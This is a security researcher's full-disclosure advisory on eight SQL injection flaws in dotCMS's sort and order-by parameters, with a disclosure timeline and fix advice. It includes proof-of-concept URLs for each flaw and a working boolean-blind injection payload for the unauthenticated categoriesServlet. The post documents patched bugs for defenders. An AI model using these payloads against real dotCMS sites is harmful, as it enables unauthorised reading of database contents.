Multiple SQL injection vulnerabilities in dotCMS (8x CVE Full Disclosure)

Background

dotCMS

dotCMS related background you can read from my older post: CVE-2016-4803 dotCMS - email header injection vulnerability (Full Disclosure). There I mentioned, that 2015-12-14 I sent 8 SQL injection vulnerabilities to dotCMS. Now it's time to disclose them.

Partly Blind SQL injection from sort functionality

Why I'm doing that? To point out really widespread problem and mistake - "order by" parameter comes from a client and it goes directly to SQL query. All 8 SQL injections from dotCMS are exactly like this.

Based on my experience, it's widespread problem even in those applications, which mostly use prepared statements. As you can not bind order by and group by parameters, then those are still often concated dynamically to SQL query.

List of Vulnerabilities

All listed SQL injection vulnerabilities are from "order by" parameter.

As attacker can control building SQL query after ORDER BY statement, attacker can not use UNION. It's also means that attacker can not get any text back to the output from other tables and other databases (if error messages are displayed out, then there can be some other options). It's Partly Blind SQL injection.

Attacker can still manipulate SQL queries and ask questios from server - answer can be just boolean, yes or no. It's enough to read out all data which is readable for current database user. It may mean also data from other databases (schemas) and tables.

CVE-2016-8902 - categoriesServlet, sort

SQL injection vulnerability in the categoriesServlet in dotCMS before 3.3.1 allows remote not authenticated attackers to execute arbitrary SQL commands via the sort parameter.

Preconditions: None. No authentication needed.

Proof-of-Concept URL, vulnerable parameter is "sort":

/categoriesServlet?start=0&count=10&sort=SQLi

Payload

sort=keywords LIMIT (SELECT CASE WHEN (/*your-boolean-question-here*/) THEN 1 ELSE -1 END)--

For non-authenticated user in the output is always value:{"items":[],"numRows":0}

I use "ELSE -1" to cause error when condition was false, just for make some change to the output.

Proof-of-Concept for Partly blind SQL injection

sort=keywords LIMIT (SELECT CASE WHEN (1=1) THEN 1 ELSE -1 END)-- true, output: {"items":[],"numRows":0}
sort=keywords LIMIT (SELECT CASE WHEN (1=0) THEN 1 ELSE -1 END)-- false, output: blank page

Related links

CVE-2016-8903 - "Templates pages", _EXT_13_orderby

SQL injection vulnerability in the "Site Browser > Templates pages" screen in dotCMS before 3.3.1 allows remote authenticated attackers to execute arbitrary SQL commands via the _EXT_13_orderby parameter.

Preconditions: attacker must be authenticated.

Proof-of-Concept URL (from "Admin Site" UI: "Site Browser > Templates pages", click on some column title in the resultset table):

/c/portal/layout?p_l_id=b7ab5d3c-5ee0-4195-a17e-8f5579d718dd&p_p_id=EXT_13&p_p_action=0&p_p_state=maximized&p_p_mode=view&_EXT_13_struts_action=%2Fext%2Ftemplates%2Fview_templates&_EXT_13_pageNumber=1&_EXT_13_orderby=SQLi

Related links

CVE-2016-8904 - "Containers pages", _EXT_12_orderby

SQL injection vulnerability in the "Site Browser > Containers pages" screen in dotCMS before 3.3.1 allows remote authenticated attackers to execute arbitrary SQL commands via the _EXT_12_orderby parameter.

Preconditions: attacker must be authenticated.

Proof-of-Concept URL (from "Admin Site" UI: "Site Browser > Containers pages", click on some column title in the resultset table):

/c/portal/layout?p_l_id=b7ab5d3c-5ee0-4195-a17e-8f5579d718dd&p_p_id=EXT_12&p_p_action=0&p_p_state=maximized&p_p_mode=view&_EXT_12_struts_action=%2Fext%2Fcontainers%2Fview_containers&_EXT_12_pageNumber=1&_EXT_12_orderby=SQLi

Related links

CVE-2016-8905 - JSONTags servlet, sort

SQL injection vulnerability in the JSONTags servlet in dotCMS before 3.3.1 allows remote authenticated attackers to execute arbitrary SQL commands via the sort parameter.

Preconditions: attacker must be authenticated.

Proof-of-Concept

/JSONTags?start=0&count=10&sort=tagname SQLi

Related links

CVE-2016-8906 - "Links pages", _EXT_18_orderby

SQL injection vulnerability in the "Site Browser > Links page" screen in dotCMS before 3.3.1 allows remote authenticated attackers to execute arbitrary SQL commands via the _EXT_18_orderby parameter.

Preconditions: attacker must be authenticated.

Proof-of-Concept URL (from "Admin Site" UI: "Site Browser > Links pages", click on some column title in the resultset table):

/c/portal/layout?p_l_id=b7ab5d3c-5ee0-4195-a17e-8f5579d718dd&p_p_id=EXT_18&p_p_action=0&p_p_state=maximized&p_p_mode=view&_EXT_18_struts_action=%2Fext%2Flinks%2Fview_links&_EXT_18_pageNumber=1&_EXT_18_orderby=SQLi

Related links

CVE-2016-8907 - "Content Types", _EXT_STRUCTURE_orderBy and _EXT_STRUCTURE_direction

SQL injection vulnerability in the "Content Types > Content Types" screen in dotCMS before 3.3.1 allows remote authenticated attackers to execute arbitrary SQL commands via the _EXT_STRUCTURE_orderBy and _EXT_STRUCTURE_direction parameters.

Preconditions: attacker must be authenticated.

Proof-of-Concept URL (from "Admin Site" UI: "Content Types > Content Types", click on some column title in the resultset table)

/c/portal/layout?p_l_id=56fedb43-dbbf-4ce2-8b77-41fb73bad015&p_p_id=EXT_STRUCTURE&p_p_action=1&p_p_state=maximized&p_p_mode=view&_EXT_STRUCTURE_struts_action=%2Fext%2Fstructure%2Fview_structure&_EXT_STRUCTURE_orderBy=SQLi&_EXT_STRUCTURE_direction=SQLi

Related links

CVE-2016-8908 - "HTML pages", _EXT_15_orderby

SQL injection vulnerability in the "Site Browser > HTML pages" screen in dotCMS before 3.3.1 allows remote authenticated attackers to execute arbitrary SQL commands via the _EXT_15_orderby parameter.

Preconditions: attacker must be authenticated.

Proof-of-Concept URL (from "Admin Site" UI: "Site Browser > HTML pages", click on some column title in the resultset table):

/c/portal/layout?p_l_id=b7ab5d3c-5ee0-4195-a17e-8f5579d718dd&p_p_id=EXT_15&p_p_action=0&p_p_state=maximized&p_p_mode=view&_EXT_15_struts_action=%2Fext%2Fhtmlpages%2Fview_htmlpages&_EXT_15_orderby=modDate,SQLi&_EXT_15_pageNumber=1

Related links

CVE-2016-4040 - "Workflow", _EXT_15_orderby

SQL injection vulnerability in the "Workflow Screen" in dotCMS before 3.3.2 allows remote administrators to execute arbitrary SQL commands via the _EXT_15_orderby parameter.

This security-hole was publically announced on dotCMS own web ("SI-36") and got CVE number earlier then others. But it was fixed one version later (3.3.1 vs 3.3.2).

Preconditions: attacker must be authenticated.

Proof-of-Concept URL (from "Admin Site" UI: "Home > Workflow tasks", click on some column title in the resultset table)

/html/portlet/ext/workflows/view_tasks_list.jsp?schemeId=&assignedTo=&createdBy=&stepId=&open=false&closed=true&keywords=&orderBy=SQLi&count=1&page=1

Related links

Vulnerability Disclosure Timeline

Timezone for dates: Tallinn/Europe (GMT+3)

"hey, you have a problem"

  • 2015-12-14 | me > dotCMS | 8 SQL injection vulnerabilities
  • 2015-12-14 | dotCMS > me | they were planning fixes in upcoming release, estimated to beginning of 2016. They thanked and wrote "security is something we take seriously"
  • 2016-03-16 | dotCMS | dotCMS version 3.3.1 release [2] - only CVE-2016-4040 is not fixed yet (CVE numbers weren't asked on that time)

"how is it going?"

  • 2016-04-07 | me > dotCMS | 5 months since first report, what is the situation with reported vulnerabilities?
  • 2016-04-07 | dotCMS | commit in GitHub | "fixes #8840 sort by sanitizing and email header injection #8841" [5]
  • 2016-04-07 | dotCMS > me | CVE-2016-4040 will be fixed in 3.5, which is estimated to be out in mid-April

releases

  • 2016-04-19 | dotCMS | dotCMS version 3.5 release [4]
  • 2016-05-09 | me > dotCMS | asked confirmation and version numbers about fixes for CVE and Full Disclosure
  • 2016-05-10 | dotCMS > me | CVE-2016-4040 is fixed in versions 3.5 and 3.3.2.
  • 2016-05-10 | dotCMS | dotCMS version 3.3.2 release [3]

publishes

  • 2016-10-23 | me > mitre.org | CVEs requested for another 7 SQL injection vulnerability
  • 2016-10-24 | mitre.org > me | CVEs assigned (CVE-2016-8902, CVE-2016-8903, CVE-2016-8904, CVE-2016-8905, CVE-2016-8906, CVE-2016-8907, CVE-2016-8908)
  • 2016-10-31 | me | Full Disclosure on security.elarlang.eu
  • 2016-11-01 | me | Full Disclosure in FullDisclosure mailinglist on seclists.org [6]

Statuses for listed problems

  • CVE-2016-8902, CVE-2016-8903, CVE-2016-8904, CVE-2016-8905, CVE-2016-8906, CVE-2016-8907, CVE-2016-8908 - fixed in 3.3.1, 3.5
  • CVE-2016-4040 - fixed in 3.3.2, 3.5

Update: Extra findings by Ben Nott

Ben Nott found one more SQL injection: CVE-2017-5344

Credit goes to Erlar Lang for discovering similar SQL injection vulnerabilities in nearby code and for inspiring this discovery.

Related links:

Update: Extra findings from fixes

When I checked how they fixed described issues, I found 2 more SQL injections: CVE-2016-10007 and CVE-2016-10008 - 2 SQL injection vulnerabilities in dotCMS, blacklist defence bypass.

Suggestions

Be always up-to-date.

Use mapping and whitelisting for order by parameters.

References

Comments

comments powered by Disqus